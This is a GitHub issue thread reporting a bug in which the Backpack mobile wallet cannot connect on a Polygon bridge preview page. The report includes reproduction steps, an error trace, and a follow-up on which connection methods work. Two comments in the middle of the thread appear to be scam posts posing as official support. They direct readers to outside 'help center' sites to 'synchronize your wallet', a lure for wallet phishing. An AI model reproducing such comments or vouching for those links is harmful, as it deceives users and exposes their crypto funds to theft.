### ISSUE TITLE
[QA] Cannot connect Backpack wallet using mobile app when source chain is Polygon

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#3112]
## Describe the current behavior in detail
Reproducible on https://preview.portalbridge.com/7e1e7d6a3d/. 

Steps:
1. Open Backpack mobile app and select Polygon network
2. Refresh https://preview.portalbridge.com/7e1e7d6a3d/ 
3. Select Polygon network
4. Try to connect Backpack wallet

Actual result: An error occurs. 

```
Uncaught (in promise) DynamicError: Network switching is not available at this time. The user should manually switch network in their wallet
    at WalletConnect.<anonymous> (pb-index-CQ4CcOOK.js:708:55991)
    at Generator.next (<anonymous>)
    at $n (pb-index-CQ4CcOOK.js:637:61918)
```

Expected result: Wallet is successfully connected.

## Notes/ Attachments

https://github.com/user-attachments/assets/4db75f72-753f-48c2-b006-686c41b59822

**Comment by Venus4023** [comment]
Hi there,

We use GitHub issues as a place to track bugs and other development-related issues. 

Please see the link below to our dedicated support line:

[Help Center :  Click Here](https://livechatsupports.app/github)

Ticket ID: WB240

Note: Click on the live chat icon at the bottom corner of the page to start a conversation.

**Comment by AlexLiveBot11549** [comment]
Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://support--protocol.vercel.app/

**Comment by tsadovska** [comment]
User can successfully connect Backpack wallet using Browser extension and with WalletConnect. 

![Image](https://github.com/user-attachments/assets/cba6a74c-dee9-448a-9c35-68107879e2cc)
